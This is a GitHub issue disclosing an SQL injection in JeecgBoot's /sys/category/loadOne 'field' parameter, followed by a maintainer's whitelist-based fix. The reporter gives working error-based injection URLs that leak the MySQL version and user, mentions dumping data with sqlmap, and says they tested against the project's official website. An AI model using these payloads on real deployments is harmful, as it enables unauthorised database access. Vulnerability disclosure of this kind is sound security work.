Skip to content

Jeecg - boot/jeecg - boot/sys/category/loadOne interface field parameters have SQL injection #3663

New issue
New issue
Closed
Closed
Jeecg - boot/jeecg - boot/sys/category/loadOne interface field parameters have SQL injection#3663
@Garck3h

Description

@Garck3h
Garck3h
opened on May 2, 2022 · edited by Garck3h
版本号:

<=3.2

问题描述:

After tests found that the jeecg - boot/jeecg - boot/sys/category/loadOne interface field parameters have SQL injection.

SQL injection exists in an interface that queries the data of the classification dictionary. After using the https://github.com/jeecgboot/jeecg-boot project source code download the launcher, grab packets SQL injection can be performed after modified, and illustrates the use of the sqlmap SQL injection.

The data received by the interface is consistent with the data in the classification dictionary, but it is not the production interface of the classification dictionary. The following two figures:
image
image

截图&代码:

Payload (view MySQL version):/jeecg-boot/sys/category/loadOne?_t=1651480890&field=extractvalue(1,concat(char(126),(version()),md5(1678381038)))&val=f39a06bf9f390ba4a53d11bc4e0018d7

image

Payload (view the current user name and host name of MySQL):/jeecg-boot/sys/category/loadOne?_t=1651480890&field=extractvalue(1,concat(char(126),(user()),md5(1678381038)))&val=f39a06bf9f390ba4a53d11bc4e0018d7

image

Results injected using sqlmap:
image

Getting the database:
image

Here is the risk code:
image

友情提示(为了提高issue处理效率):

  • 未按格式要求发帖,会被直接删掉;
  • 请自己初判问题描述是否清楚,是否方便我们调查处理;
  • 针对问题请说明是Online在线功能(需说明用的主题模板),还是生成的代码功能;
  • 描述过于简单或模糊,导致无法处理的,会被直接删掉;

Activity

zhangdaiscott

zhangdaiscott commented on May 4, 2022

@zhangdaiscott
zhangdaiscott
on May 4, 2022
Member

收录 ty

tygithub1

tygithub1 commented on May 6, 2022

@tygithub1
tygithub1
on May 6, 2022

the menu "classified dictionary", there is no interface that you described to be called, if you want to test this interface /sys/category/loadOne,pls pass plain string instead of expression

Garck3h

Garck3h commented on May 6, 2022

@Garck3h
Garck3h
on May 6, 2022
Author

菜单“分类字典”,没有您描述要调用的接口,如果您想测试此接口/sys/category/loadOne,请传递纯字符串而不是表达式

Oh, sorry. It may not be in the "classification dictionary" menu bar, but it does exist, it can query the "classification dictionary" data, by changing the value of the "field" attack, as shown in the normal request result:
image

Garck3h

Garck3h commented on May 6, 2022

@Garck3h
Garck3h
on May 6, 2022
Author

the menu "classified dictionary", there is no interface that you described to be called, if you want to test this interface /sys/category/loadOne,pls pass plain string instead of expression

Hello, I have confirmed that the interface exists. When you perform the following steps, you will find the packet request. Common Cases --> Custom Components --> Tree Dictionary:
image
image

tygithub1

tygithub1 commented on May 6, 2022

@tygithub1
tygithub1
on May 6, 2022 · edited by tygithub1

i got it , you can try like this:

    @RequestMapping(value = "/loadOne", method = RequestMethod.GET)
 	public Result<SysCategory> loadOne(@RequestParam(name="field") String field,@RequestParam(name="val") String val) {
 		Result<SysCategory> result = new Result<SysCategory>();
 		try {
			//检查字段是不是实体中的
			boolean isClassField = SqlInjectionUtil.isClassField(field, SysCategory.class);
			if (!isClassField) {
				return Result.error("字段无效,请检查!");
			}
	
 			QueryWrapper<SysCategory> query = new QueryWrapper<SysCategory>();
 			query.eq(field, val);
 			List<SysCategory> ls = this.sysCategoryService.list(query);
                        //ignore many code

	/**
	 * 判断给定的字段是不是类中的属性
	 * @param field
	 * @param clazz
	 * @return
	 */
	public static boolean isClassField(String field, Class clazz){
		Field[] fields = clazz.getDeclaredFields();
		for(int i=0;i<fields.length;i++){
			if(fields[i].getName().equalsIgnoreCase(field)){
				return true;
			}
		}
		return false;
	}
Garck3h

Garck3h commented on May 7, 2022

@Garck3h
Garck3h
on May 7, 2022
Author

i got it , you can try like this:

    @RequestMapping(value = "/loadOne", method = RequestMethod.GET)
 	public Result<SysCategory> loadOne(@RequestParam(name="field") String field,@RequestParam(name="val") String val) {
 		Result<SysCategory> result = new Result<SysCategory>();
 		try {
			//检查字段是不是实体中的
			boolean isClassField = SqlInjectionUtil.isClassField(field, SysCategory.class);
			if (!isClassField) {
				return Result.error("字段无效,请检查!");
			}
	
 			QueryWrapper<SysCategory> query = new QueryWrapper<SysCategory>();
 			query.eq(field, val);
 			List<SysCategory> ls = this.sysCategoryService.list(query);
                        //ignore many code

 /**
  * 判断给定的字段是不是类中的属性
  * @param field
  * @param clazz
  * @return
  */
 public static boolean isClassField(String field, Class clazz){
 	Field[] fields = clazz.getDeclaredFields();
 	for(int i=0;i<fields.length;i++){
 		if(fields[i].getName().equalsIgnoreCase(field)){
 			return true;
 		}
 	}
 	return false;
 }

image
When I give it some malicious statements, I can query the version of the database, database name and other information, and even the whole database data down, so it is very dangerous.Here is a bit of offense to the official website, do the above verification.

zhangdaiscott

zhangdaiscott commented on May 7, 2022

@zhangdaiscott
zhangdaiscott
on May 7, 2022
Member

已处理

zhangdaiscott
closed this as completedon May 7, 2022
chuxl2017

chuxl2017 commented on Jul 27, 2022

@chuxl2017
chuxl2017
on Jul 27, 2022

@zhangdaiscott 请问,对应的commit是哪个?

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

      Development

      No branches or pull requests

        Participants

        @zhangdaiscott@tygithub1@chuxl2017@Garck3h

        Issue actions
          Jeecg - boot/jeecg - boot/sys/category/loadOne interface field parameters have SQL injection · Issue #3663 · jeecgboot/JeecgBoot